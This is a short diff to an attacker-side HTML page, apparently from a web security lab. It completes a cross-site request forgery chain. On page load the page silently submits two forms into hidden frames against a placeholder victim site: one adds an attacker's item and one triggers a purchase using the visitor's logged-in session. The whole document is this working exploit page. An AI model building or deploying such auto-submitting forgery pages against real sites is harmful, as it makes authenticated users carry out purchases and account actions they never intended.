--- a/attacker_site/iframe_csrf_chain.html
+++ b/attacker_site/iframe_csrf_chain.html
@@ -5,14 +5,14 @@
 		<script>
 			window.onload = function() {
 							document.forms[0].submit();
-							//document.forms[1].submit();
+							document.forms[1].submit();
 						}
 		</script>
 
 	</head>
 
 	<body>
-		<form action="http://victim.site:1337/auth/attacker_item" method="GET" target="_blank">
+		<form action="http://victim.site:1337/auth/attacker_item" method="GET" target="csrf1">
 		</form>
 
 		<form action="http://victim.site:1337/auth/purchase" method="GET" target="csrf2">
